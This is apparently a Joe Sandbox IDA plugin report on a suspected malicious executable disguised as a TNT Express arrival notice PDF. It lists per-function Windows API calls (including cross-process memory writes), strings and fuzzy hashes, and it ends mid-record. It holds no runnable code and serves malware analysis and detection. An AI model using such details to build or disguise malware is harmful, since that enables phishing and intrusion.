Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 53a217213d16c2ef00c07d620888bf2c46b77d653801b3c1e6e46d7e929e55f5
Instruction ID: 055c363f070b1db11d0a0673d7ab7222e697d511168b1a1e79c5e4a66c8d5389
Opcode Fuzzy Hash: 53a217213d16c2ef00c07d620888bf2c46b77d653801b3c1e6e46d7e929e55f5
Instruction Fuzzy Hash: 1EF0197269430DABC625BB78F981D2A7BDAFB043107A40805F248EB611C730F8809671

Function 00925C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00925C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00925C6F
MessageBeep.USER32(00000000), ref: 00925C87
KillTimer.USER32(?,0000040A), ref: 00925CA3
EndDialog.USER32(?,00000001), ref: 00925CBD

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9c1b18c557d7ddc6ba8835a1cf51b9b7a367cdf636ccdc8c9429671dd72f4e69
Instruction ID: 58a663761afa5a9bf2f1a9dbdd175a5706ae1b7b8e44f97754c37b8c42a4deb4
Opcode Fuzzy Hash: 9c1b18c557d7ddc6ba8835a1cf51b9b7a367cdf636ccdc8c9429671dd72f4e69
Instruction Fuzzy Hash: 4F018170514B14AFEB219B11ED4EFA677B8FB04B06F010569B583A14E1EBF4AA849B90

Function 008F22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008F22BE

Part of subcall function 008F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000), ref: 008F29DE
Part of subcall function 008F29C8: GetLastError.KERNEL32(00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000,00000000), ref: 008F29F0

_free.LIBCMT ref: 008F22D0
_free.LIBCMT ref: 008F22E3
_free.LIBCMT ref: 008F22F4
_free.LIBCMT ref: 008F2305

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9052106cef403852abe672e829efddfac2cd4bd605999072fa6b73da46f6ad4e
Instruction ID: 8c22fb2efb9464a2fc9e980c8c1efb12c4b23fdbf34b3a50c1bc43756c2628fd
Opcode Fuzzy Hash: 9052106cef403852abe672e829efddfac2cd4bd605999072fa6b73da46f6ad4e
Instruction Fuzzy Hash: 10F03AB19A82268BC612BF6CBC01D2C3FA4FB28761700050BF524D73B1C7714911BBA5

Function 008D95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008D95D4
StrokeAndFillPath.GDI32(?,?,009171F7,00000000,?,?,?), ref: 008D95F0
SelectObject.GDI32(?,00000000), ref: 008D9603
DeleteObject.GDI32 ref: 008D9616
StrokePath.GDI32(?), ref: 008D9631

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: ccaa3ce086573d65a34a06ceffc4e2c4d4a2a3ac1398b69c8a735f35bf5d731c
Instruction ID: 513412bec7034123c70b43eb1fa5d631d9d70b110fc3785f3c72c933f46fbd7d
Opcode Fuzzy Hash: ccaa3ce086573d65a34a06ceffc4e2c4d4a2a3ac1398b69c8a735f35bf5d731c
Instruction Fuzzy Hash: EAF0E430029709EFDB125F6AFD187643B65FB113A6F048316E465951F0CB318991EF20

Function 008F0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 008F10F9
__freea.LIBCMT ref: 008F1117

Part of subcall function 008F1537: _free.LIBCMT ref: 008F154F

Strings

am/pm, xrefs: 008F117A
a/p, xrefs: 008F11DE

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 0816818cd9b7ce6606e36bcba0e9f2945743d064061c633ea2349d6d8b6cb7fa
Instruction ID: 1d2f9ba585323e8dc210bd583f311e5c01f01e237c1e4b26c89864df8a951117
Opcode Fuzzy Hash: 0816818cd9b7ce6606e36bcba0e9f2945743d064061c633ea2349d6d8b6cb7fa
Instruction Fuzzy Hash: 8FD1DF3190020EDADF289F78C85DABAB7B5FF05704F280159EB01EBA51D7799D80CBA1

Function 00947B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 008E0242: EnterCriticalSection.KERNEL32(0099070C,00991884,?,?,008D198B,00992518,?,?,?,008C12F9,00000000), ref: 008E024D
Part of subcall function 008E0242: LeaveCriticalSection.KERNEL32(0099070C,?,008D198B,00992518,?,?,?,008C12F9,00000000), ref: 008E028A

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 008E00A3: __onexit.LIBCMT ref: 008E00A9

__Init_thread_footer.LIBCMT ref: 00947BFB

Part of subcall function 008E01F8: EnterCriticalSection.KERNEL32(0099070C,?,?,008D8747,00992514), ref: 008E0202
Part of subcall function 008E01F8: LeaveCriticalSection.KERNEL32(0099070C,?,008D8747,00992514), ref: 008E0235

Strings

G, xrefs: 00947C7F
5, xrefs: 00947C78
Variable must be of type 'Object'., xrefs: 00947C3A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: a777a3e2237eac8559501b4c71769e29755625943a99bca14f5d628584c8611c
Instruction ID: 13914ec71064333dd5a0879440ec22837135f7c591048512a86eab0532f7482e
Opcode Fuzzy Hash: a777a3e2237eac8559501b4c71769e29755625943a99bca14f5d628584c8611c
Instruction Fuzzy Hash: B5916A70A04209AFCB14EF98D891EBDB7B5FF89304F108459F846AB392DB71AE45CB51

Function 00922716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009221D0,?,?,00000034,00000800,?,00000034), ref: 0092B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00922760

Part of subcall function 0092B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0092B3F8

Part of subcall function 0092B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0092B355
Part of subcall function 0092B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00922194,00000034,?,?,00001004,00000000,00000000), ref: 0092B365
Part of subcall function 0092B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00922194,00000034,?,?,00001004,00000000,00000000), ref: 0092B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009227CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0092281A

Strings

@, xrefs: 00922832

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 8e3329d947c9940932820e6117fb7d893d44a6e5afdd0892a5040b28e928a8cd
Instruction ID: 2b1c215c059a8defe6c61d21ee55f1c69cfd4740280de610561734ef679f3c15
Opcode Fuzzy Hash: 8e3329d947c9940932820e6117fb7d893d44a6e5afdd0892a5040b28e928a8cd
Instruction Fuzzy Hash: F2414D72901228BFDB10DBA4DC85BEEBBB8EF45300F008055FA55B7195DB70AE45CB61

Function 008F172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe,00000104), ref: 008F1769
_free.LIBCMT ref: 008F1834
_free.LIBCMT ref: 008F183E

Strings

C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, xrefs: 008F1760, 008F1767, 008F1796, 008F17CE

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
API String ID: 2506810119-2206740783
Opcode ID: 8fcce3347e9e75c87e29c553c69d3e5952d677e909aa4f82bb330f414daec671
Instruction ID: ee61855e4912e0f53ec89f029deff0138b2e2f24e4d25fdc9d2ce6ce8c1e7b07
Opcode Fuzzy Hash: 8fcce3347e9e75c87e29c553c69d3e5952d677e909aa4f82bb330f414daec671
Instruction Fuzzy Hash: E4318D71A1421CEFDF21EBA99989DAEBBFCFB85350F104166EA04D7211D6B08A40DB91

Function 0092C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0092C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0092C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00991990,00EA62C8), ref: 0092C395

Strings

0, xrefs: 0092C2DF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 4fa1986a24c4b126dc842fd224559e42625932e8433ea1d637d4c36674496e42
Instruction ID: cfacee27535428980638e08ce8cb1b4c21720115ef99d00308051c36aed3af34
Opcode Fuzzy Hash: 4fa1986a24c4b126dc842fd224559e42625932e8433ea1d637d4c36674496e42
Instruction Fuzzy Hash: 8D41BFB12083519FD720DF29E884B5EBBE8EF85321F008A5DF9A5972D5D730E904CB52

Function 00954416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0095CC08,00000000,?,?,?,?), ref: 009544AA
GetWindowLongW.USER32 ref: 009544C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009544D7

Strings

SysTreeView32, xrefs: 0095447C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 380cd37909a5800ec4c43dbec349822ca14bab6cd6651d1472f782952d79e492
Instruction ID: f4513fa66b5ec717a9f3885b91f3d9f98f393a0768068533a430f59ab52c5ca0
Opcode Fuzzy Hash: 380cd37909a5800ec4c43dbec349822ca14bab6cd6651d1472f782952d79e492
Instruction Fuzzy Hash: 3931DC31254605AFDF608E39DC45BEA77A9EB08339F204315FD79A21E0D730EC959B50

Function 0094304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0094335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00943077,?,?), ref: 00943378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0094307A
_wcslen.LIBCMT ref: 0094309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00943106

Strings

255.255.255.255, xrefs: 00943095, 0094309A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 0e8d41a372f9164b4cdfd6027150be7dd652f4d8f52d8e76d254e4a7182b85b7
Instruction ID: 31bd4a725075c21a1d3af103aac161ee0d8b6411ad636021110274ce6757586c
Opcode Fuzzy Hash: 0e8d41a372f9164b4cdfd6027150be7dd652f4d8f52d8e76d254e4a7182b85b7
Instruction Fuzzy Hash: CE31CF392042019FDB20CF79C486EAA77E4EF58318F24C199E9159B7A2DB72EE41C761

Function 00954653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00954705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00954713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0095471A

Strings

msctls_updown32, xrefs: 00954684

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 2d2264b91af2f91530e5feaf41ae3af180265696664b746326a934497f28632f
Instruction ID: f14542caf187266306f3c88dde86936b1bdc59dd12590d5338da82b193c7fce9
Opcode Fuzzy Hash: 2d2264b91af2f91530e5feaf41ae3af180265696664b746326a934497f28632f
Instruction Fuzzy Hash: F22190B5605209AFDB10DF69ECC1DA737ADEB8A3A9B000459FA00DB251CB30EC55DB60

Function 009295AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092961D

Strings

#OnAutoItStartRegister, xrefs: 009295F3
#notrayicon, xrefs: 009295B7
#requireadmin, xrefs: 009295D9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 586dbd05f016d192129ec5549b4775cce14496c2a6a4aea0570e7e27549c24a4
Instruction ID: a103dbe52f2007e8cc1075bbc5cf9f64939e15eb68762694705c10e753d72f10
Opcode Fuzzy Hash: 586dbd05f016d192129ec5549b4775cce14496c2a6a4aea0570e7e27549c24a4
Instruction Fuzzy Hash: D2213832204261A6D331BA29AC16FBB73DCEF92310F10442AFD49DB149EB659D45C396

Function 009537B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00953840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00953850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00953876

Strings

Listbox, xrefs: 0095380F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 771101f4ab2b4732af70350eda02977258f5375bcbe9519d44717d1d805e6c91
Instruction ID: 9b0a6c77495ec39963b623f10c3781d429b1ec08e8c27f8bf462aa422f824396
Opcode Fuzzy Hash: 771101f4ab2b4732af70350eda02977258f5375bcbe9519d44717d1d805e6c91
Instruction Fuzzy Hash: 1E21C272610218BBEF11CFA6DC41FBB376EEF89795F108124FA10AB190C671DC569BA0

Function 009349F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00934A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00934A5C
SetErrorMode.KERNEL32(00000000,?,?,0095CC08), ref: 00934AD0

Strings

%lu, xrefs: 00934A6F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 3e84f3b0012edff3e976024b49cc904130a4379a87e936443cd1f4a8bcad0339
Instruction ID: c51dcfa364edebdaf848a1b86155a4e335c06f7e4f7ad4a1151ee50c8229f9c5
Opcode Fuzzy Hash: 3e84f3b0012edff3e976024b49cc904130a4379a87e936443cd1f4a8bcad0339
Instruction Fuzzy Hash: 4D313E75A04209AFDB10DF58C885EAA7BF8EF48308F1580A9F909DB252D771ED45CB62

Function 009541EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0095424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00954264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00954271

Strings

msctls_trackbar32, xrefs: 00954226

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 0c8392a7b2d622d92ffa102df5dca7e95688d2945df6a3622c3d55ebb7f08134
Instruction ID: 8b35707415a207721b3fab2ff5644afca95e934e80b9351dd249b585afbf3c1d
Opcode Fuzzy Hash: 0c8392a7b2d622d92ffa102df5dca7e95688d2945df6a3622c3d55ebb7f08134
Instruction Fuzzy Hash: 10110631240308BEEF209F6ACC06FAB3BACEF95B59F110524FE55E20A0D271DC619B20

Function 00922F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

Part of subcall function 00922DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00922DC5
Part of subcall function 00922DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00922DD6
Part of subcall function 00922DA7: GetCurrentThreadId.KERNEL32 ref: 00922DDD
Part of subcall function 00922DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00922DE4

GetFocus.USER32 ref: 00922F78

Part of subcall function 00922DEE: GetParent.USER32(00000000), ref: 00922DF9

GetClassNameW.USER32(?,?,00000100), ref: 00922FC3
EnumChildWindows.USER32(?,0092303B), ref: 00922FEB

Strings

%s%d, xrefs: 00922FFF

Memory Dump Source

